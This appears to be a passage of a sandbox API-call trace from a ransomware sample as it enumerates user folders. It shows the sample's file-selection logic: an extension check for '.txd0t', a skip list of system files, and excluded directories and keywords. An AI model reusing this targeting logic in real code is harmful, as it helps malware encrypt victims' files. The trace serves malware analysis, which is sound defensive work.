nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0129.100] StrCmpW (psz1="Local Settings", psz2=".") returned 1 [0129.100] StrCmpW (psz1="Local Settings", psz2="..") returned 1 [0129.100] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbaa63, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0129.100] StrCmpW (psz1="Music", psz2=".") returned 1 [0129.100] StrCmpW (psz1="Music", psz2="..") returned 1 [0129.100] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0129.100] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0129.100] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="Music", cchMax=1058 | out: psz1="C:\\Users\\Default\\Music") returned="C:\\Users\\Default\\Music" [0129.101] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\Default\\Music", cchMax=1070 | out: psz1="C:\\Users\\Default\\Music") returned="C:\\Users\\Default\\Music" [0129.101] StrNCatW (in: psz1="C:\\Users\\Default\\Music", psz2="\\*", cchMax=1070 | out: psz1="C:\\Users\\Default\\Music\\*") returned="C:\\Users\\Default\\Music\\*" [0129.101] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Music\\*", lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbaa63, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23f0 [0129.101] StrCmpW (psz1=".", psz2=".") returned 0 [0129.101] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbaa63, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.101] StrCmpW (psz1="..", psz2=".") returned 1 [0129.101] StrCmpW (psz1="..", psz2="..") returned 0 [0129.101] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbaa63, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0129.101] FindClose (in: hFindFile=0xec23f0 | out: hFindFile=0xec23f0) returned 1 [0129.101] GetProcessHeap () returned 0xe30000 [0129.101] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0129.101] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0129.101] StrCmpW (psz1="My Documents", psz2=".") returned 1 [0129.101] StrCmpW (psz1="My Documents", psz2="..") returned 1 [0129.101] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0129.101] StrCmpW (psz1="NetHood", psz2=".") returned 1 [0129.101] StrCmpW (psz1="NetHood", psz2="..") returned 1 [0129.101] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c4aac40, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x19fa8eb, ftLastAccessTime.dwHighDateTime=0x1d5d811, ftLastWriteTime.dwLowDateTime=0x19fa8eb, ftLastWriteTime.dwHighDateTime=0x1d5d811, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0129.101] StrCmpW (psz1="NTUSER.DAT", psz2=".") returned 1 [0129.101] StrCmpW (psz1="NTUSER.DAT", psz2="..") returned 1 [0129.101] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0129.101] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0129.101] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="NTUSER.DAT", cchMax=1058 | out: psz1="C:\\Users\\Default\\NTUSER.DAT") returned="C:\\Users\\Default\\NTUSER.DAT" [0129.101] PathFindExtensionW (pszPath="NTUSER.DAT") returned=".DAT" [0129.101] StrCmpW (psz1=".DAT", psz2=".txd0t") returned -1 [0129.101] StrCmpIW (psz1="NTUSER.DAT", psz2="bootsect.bak") returned 1 [0129.101] StrCmpIW (psz1="NTUSER.DAT", psz2="iconcache.db") returned 1 [0129.101] StrCmpIW (psz1="NTUSER.DAT", psz2="thumbs.db") returned -1 [0129.101] StrCmpIW (psz1="NTUSER.DAT", psz2=" ransomware ") returned 1 [0129.101] StrCmpIW (psz1="NTUSER.DAT", psz2=" ransom ") returned 1 [0129.102] StrCmpIW (psz1="NTUSER.DAT", psz2="debug.txt") returned 1 [0129.102] StrCmpIW (psz1="NTUSER.DAT", psz2="boot.ini") returned 1 [0129.102] StrCmpIW (psz1="NTUSER.DAT", psz2="desktop.ini") returned 1 [0129.102] StrCmpIW (psz1="NTUSER.DAT", psz2="autorun.inf") returned 1 [0129.102] StrCmpIW (psz1="NTUSER.DAT", psz2="ntuser.dat") returned 0 [0129.102] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c6021fd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x6c6021fd, ftLastAccessTime.dwHighDateTime=0x1d29fdc, ftLastWriteTime.dwLowDateTime=0x6c6021fd, ftLastWriteTime.dwHighDateTime=0x1d29fdc, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0129.102] StrCmpW (psz1="NTUSER.DAT.LOG1", psz2=".") returned 1 [0129.102] StrCmpW (psz1="NTUSER.DAT.LOG1", psz2="..") returned 1 [0129.102] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c6021fd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x6c6021fd, ftLastAccessTime.dwHighDateTime=0x1d29fdc, ftLastWriteTime.dwLowDateTime=0x6c6021fd, ftLastWriteTime.dwHighDateTime=0x1d29fdc, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0129.102] StrCmpW (psz1="NTUSER.DAT.LOG2", psz2=".") returned 1 [0129.102] StrCmpW (psz1="NTUSER.DAT.LOG2", psz2="..") returned 1 [0129.102] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7dab84ff, ftCreationTime.dwHighDateTime=0x1d2fa07, ftLastAccessTime.dwLowDateTime=0xacbd1187, ftLastAccessTime.dwHighDateTime=0x1d2fa0d, ftLastWriteTime.dwLowDateTime=0x855f639a, ftLastWriteTime.dwHighDateTime=0x1d2fa07, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0129.102] StrCmpW (psz1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf", psz2=".") returned 1 [0129.102] StrCmpW (psz1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf", psz2="..") returned 1 [0129.102] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7ddd9675, ftCreationTime.dwHighDateTime=0x1d2fa07, ftLastAccessTime.dwLowDateTime=0xacbd1187, ftLastAccessTime.dwHighDateTime=0x1d2fa0d, ftLastWriteTime.dwLowDateTime=0x855d0141, ftLastWriteTime.dwHighDateTime=0x1d2fa07, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0129.102] StrCmpW (psz1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms", psz2=".") returned 1 [0129.102] StrCmpW (psz1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms", psz2="..") returned 1 [0129.102] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7de71fdf, ftCreationTime.dwHighDateTime=0x1d2fa07, ftLastAccessTime.dwLowDateTime=0x855d0141, ftLastAccessTime.dwHighDateTime=0x1d2fa07, ftLastWriteTime.dwLowDateTime=0x855d0141, ftLastWriteTime.dwHighDateTime=0x1d2fa07, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0129.102] StrCmpW (psz1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms", psz2=".") returned 1 [0129.102] StrCmpW (psz1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms", psz2="..") returned 1 [0129.102] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8b6f06dc, ftCreationTime.dwHighDateTime=0x1d32741, ftLastAccessTime.dwLowDateTime=0x8b6f06dc, ftLastAccessTime.dwHighDateTime=0x1d32741, ftLastWriteTime.dwLowDateTime=0x8b762e4b, ftLastWriteTime.dwHighDateTime=0x1d32741, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", cAlternateFileName="NTUSER~2.BLF")) returned 1 [0129.102] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", psz2=".") returned 1 [0129.102] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", psz2="..") returned 1 [0129.102] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8b6f06dc, ftCreationTime.dwHighDateTime=0x1d32741, ftLastAccessTime.dwLowDateTime=0x8b6f06dc, ftLastAccessTime.dwHighDateTime=0x1d32741, ftLastWriteTime.dwLowDateTime=0x8b762e4b, ftLastWriteTime.dwHighDateTime=0x1d32741, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~3.REG")) returned 1 [0129.102] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", psz2=".") returned 1 [0129.102] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", psz2="..") returned 1 [0129.103] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8b716935, ftCreationTime.dwHighDateTime=0x1d32741, ftLastAccessTime.dwLowDateTime=0x8b716935, ftLastAccessTime.dwHighDateTime=0x1d32741, ftLastWriteTime.dwLowDateTime=0x8b762e4b, ftLastWriteTime.dwHighDateTime=0x1d32741, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~4.REG")) returned 1 [0129.103] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", psz2=".") returned 1 [0129.103] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", psz2="..") returned 1 [0129.103] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbafc3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0129.103] StrCmpW (psz1="Pictures", psz2=".") returned 1 [0129.103] StrCmpW (psz1="Pictures", psz2="..") returned 1 [0129.103] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0129.103] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0129.103] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="Pictures", cchMax=1058 | out: psz1="C:\\Users\\Default\\Pictures") returned="C:\\Users\\Default\\Pictures" [0129.103] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="\\windows\\system32\\") returned 0x0 [0129.103] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.103] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="\\windows\\system\\") returned 0x0 [0129.103] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.103] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.103] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="\\appdata\\local\\") returned 0x0 [0129.103] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.103] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.103] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.103] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch=":\\boot\\") returned 0x0 [0129.103] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch=":\\perflogs\\") returned 0x0 [0129.103] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch=":\\programdata\\") returned 0x0 [0129.103] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch=":\\drivers\\") returned 0x0 [0129.103] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch=":\\wsus\\") returned 0x0 [0129.103] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.103] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.103] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="crypt_detect") returned 0x0 [0129.103] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="cryptolocker") returned 0x0 [0129.103] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="ransomware") returned 0x0 [0129.104] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="C:\\WINDOWS") returned 0x0 [0129.104] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.104] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="C:\\Program Files") returned 0x0 [0129.104] GetProcessHeap () returned 0xe30000 [0129.104] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b4) returned 0xed39f8 [0129.104] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\Default\\Pictures", cchMax=1076 | out: psz1="C:\\Users\\Default\\Pictures") returned="C:\\Users\\Default\\Pictures" [0129.104] StrNCatW (in: psz1="C:\\Users\\Default\\Pictures", psz2="\\*", cchMax=1076 | out: psz1="C:\\Users\\Default\\Pictures\\*") returned="C:\\Users\\Default\\Pictures\\*" [0129.104] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Pictures\\*", lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbafc3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23f0 [0129.104] StrCmpW (psz1=".", psz2=".") returned 0 [0129.104] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbafc3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.104] StrCmpW (psz1="..", psz2=".") returned 1 [0129.104] StrCmpW (psz1="..", psz2="..") returned 0 [0129.104] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbafc3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0129.104] FindClose (in: hFindFile=0xec23f0 | out: hFindFile=0xec23f0) returned 1 [0129.104] GetProcessHeap () returned 0xe30000 [0129.104] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0129.104] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0129.104] StrCmpW (psz1="PrintHood", psz2=".") returned 1 [0129.104] StrCmpW (psz1="PrintHood", psz2="..") returned 1 [0129.104] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0129.104] StrCmpW (psz1="Recent", psz2=".") returned 1 [0129.104] StrCmpW (psz1="Recent", psz2="..") returned 1 [0129.104] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbb8a6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0129.104] StrCmpW (psz1="Saved Games", psz2=".") returned 1 [0129.104] StrCmpW (psz1="Saved Games", psz2="..") returned 1 [0129.104] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0129.104] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0129.104] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="Saved Games", cchMax=1058 | out: psz1="C:\\Users\\Default\\Saved Games") returned="C:\\Users\\Default\\Saved Games" [0129.104] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="\\windows\\system32\\") returned 0x0 [0129.105] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.105] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="\\windows\\system\\") returned 0x0 [0129.105] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.105] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.105] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="\\appdata\\local\\") returned 0x0 [0129.105] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.105] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.105] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.105] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch=":\\boot\\") returned 0x0 [0129.105] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch=":\\perflogs\\") returned 0x0 [0129.105] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch=":\\programdata\\") returned 0x0 [0129.105] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch=":\\drivers\\") returned 0x0 [0129.105] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch=":\\wsus\\") returned 0x0 [0129.105] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.105] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.105] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="crypt_detect") returned 0x0 [0129.105] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="cryptolocker") returned 0x0 [0129.105] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="ransomware") returned 0x0 [0129.105] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="C:\\WINDOWS") returned 0x0 [0129.105] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.105] StrStrIW (lpFirst="C:\\Users\\Default\\Saved Games", lpSrch="C:\\Program Files") returned 0x0 [0129.105] GetProcessHeap () returned 0xe30000 [0129.105] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ba) returned 0xed39f8 [0129.105] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\Default\\Saved Games", cchMax=1082 | out: psz1="C:\\Users\\Default\\Saved Games") returned="C:\\Users\\Default\\Saved Games" [0129.105] StrNCatW (in: psz1="C:\\Users\\Default\\Saved Games", psz2="\\*", cchMax=1082 | out: psz1="C:\\Users\\Default\\Saved Games\\*") returned="C:\\Users\\Default\\Saved Games\\*" [0129.105] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Saved Games\\*", lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbb8a6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23b0 [0129.105] StrCmpW (psz1=".", psz2=".") returned 0 [0129.105] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, 